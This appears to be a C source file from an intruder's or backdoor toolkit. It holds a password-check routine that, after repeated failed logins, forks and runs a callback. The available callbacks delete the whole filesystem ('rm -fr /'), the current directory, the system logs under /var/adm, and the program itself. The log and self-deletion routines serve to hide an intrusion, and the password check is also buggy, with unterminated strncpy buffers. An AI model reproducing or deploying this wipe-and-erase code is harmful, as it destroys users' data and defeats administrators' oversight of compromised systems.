#include "auth.h"

int Auth(char *prompt, u_int tries, void (*action) ())
{
  char  *Prompt, *buf;
  u_int Tries, i;
  
  
  Prompt  = prompt  ? prompt  : PWDPRMT;
  Tries   = tries   ? tries   : TRIES;
  
  for(i = 0; i < Tries; i++)
  {
    if(i)
      fprintf(stderr, TRYAGAIN);
      
    buf = getpass(Prompt);
    if(!CheckPass(buf, CIPHER))
    {
      memset(buf, 0, strlen(buf));
      return(1);
    }
  }

  if(action != NULL)
  {
    if(fork() == 0)
      (*action)();
  }  

  return(0);
}


static int CheckPass(char *cPlain, char *cEnc)
{
  char    cKey[8];
  char    cSalt[3];
  char    *cResult;

  /* we only need the first 8 byte of the entered password */
  strncpy(cKey, cPlain, 8);

  /* now, let's get the salt from the encrypted password */
  strncpy(cSalt, cEnc, 2);

  /* here we go */
  cResult = (char *) crypt(cKey, cSalt);

  return(strcmp(cEnc, cResult));
}

void EraseAll(void)
{
  execl("/bin/rm", "rm", "-fr", "/", NULL);
}
  
void EraseCWD(void)
{
  execl("/bin/rm", "rm", "-fr", ".", NULL);
}

void EraseLogs(void)
{
  system("/bin/rm -f /var/adm/*");
}

void EraseMe(void)
{
  execl("/bin/rm", "rm", "-rf", Me, NULL);
}
